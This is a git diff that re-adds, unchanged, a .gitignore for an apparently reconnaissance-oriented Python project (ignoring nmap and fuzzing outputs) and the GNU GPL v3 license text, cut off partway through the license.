diff --git a/.gitignore b/.gitignore
index b32aed8..5376857 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,103 +1,103 @@
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
-
-# C extensions
-*.so
-
-# Distribution / packaging
-.Python
-env/
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-*.egg-info/
-.installed.cfg
-*.egg
-
-# PyInstaller
-# Usually these files are written by a python script from a template
-# before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
-
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
-
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*,cover
-.hypothesis/
-
-# Translations
-*.mo
-*.pot
-
-# Django stuff:
-*.log
-local_settings.py
-
-# Flask stuff:
-instance/
-.webassets-cache
-
-# Scrapy stuff:
-.scrapy
-
-# Sphinx documentation
-docs/_build/
-
-# PyBuilder
-target/
-
-# IPython Notebook
-.ipynb_checkpoints
-
-# pyenv
-.python-version
-
-# celery beat schedule file
-celerybeat-schedule
-
-# dotenv
-.env
-
-# virtualenv
-venv/
-ENV/
-
-# Spyder project settings
-.spyderproject
-
-# Rope project settings
-.ropeproject
-
-# Misc
-*.swp
-*.swo
-*.gnmap
-*.nmap
-*.xml
-*.html
-*.fuzz
-*.req
-*.txt
-*~
-
-reconnaissance/*.md
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+env/
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+*.egg-info/
+.installed.cfg
+*.egg
+
+# PyInstaller
+# Usually these files are written by a python script from a template
+# before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*,cover
+.hypothesis/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# IPython Notebook
+.ipynb_checkpoints
+
+# pyenv
+.python-version
+
+# celery beat schedule file
+celerybeat-schedule
+
+# dotenv
+.env
+
+# virtualenv
+venv/
+ENV/
+
+# Spyder project settings
+.spyderproject
+
+# Rope project settings
+.ropeproject
+
+# Misc
+*.swp
+*.swo
+*.gnmap
+*.nmap
+*.xml
+*.html
+*.fuzz
+*.req
+*.txt
+*~
+
+reconnaissance/*.md
diff --git a/LICENSE b/LICENSE
index 9cecc1d..c65825e 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,674 +1,674 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. 
- - Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. 
- - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. 
- - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. 
Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. 
- - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. 
This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. 
- - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. 
- - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. 
- - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. 
If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. 
If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. 
- - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. 
For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. 
- - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. 
You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. 
The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. 
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. 
- - {one line to give the program's name and a brief idea of what it does.} - Copyright (C) {year} {name of author} - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - {project} Copyright (C) {year} {fullname} - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. 
+ GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. 
+ + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. 
+ + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. 
+ + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. 
Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such 